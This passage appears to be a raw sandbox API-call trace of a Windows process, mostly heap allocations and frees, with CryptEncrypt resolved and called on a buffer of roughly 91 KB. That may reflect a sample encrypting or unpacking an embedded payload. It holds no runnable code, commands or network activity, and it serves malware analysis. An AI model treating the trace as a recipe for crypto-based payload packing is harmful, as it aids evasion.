[0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509c8 [0130.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.646] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54080 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0130.647] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1651a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x16520) returned 1 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0130.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0130.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0130.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0130.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0130.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.651] CharLowerBuffW (in: lpsz="byte[91424]", cchLength=0xb | out: lpsz="byte[91424]") returned 0xb [0130.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.656] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0130.660] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ee32b8*, pdwDataLen=0x8cef60*=0x1651a, dwBufLen=0x16520 | out: pbData=0x2ee32b8*, pdwDataLen=0x8cef60*=0x16520) returned 1 [0130.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0130.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0130.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0130.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0130.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0130.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0130.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: 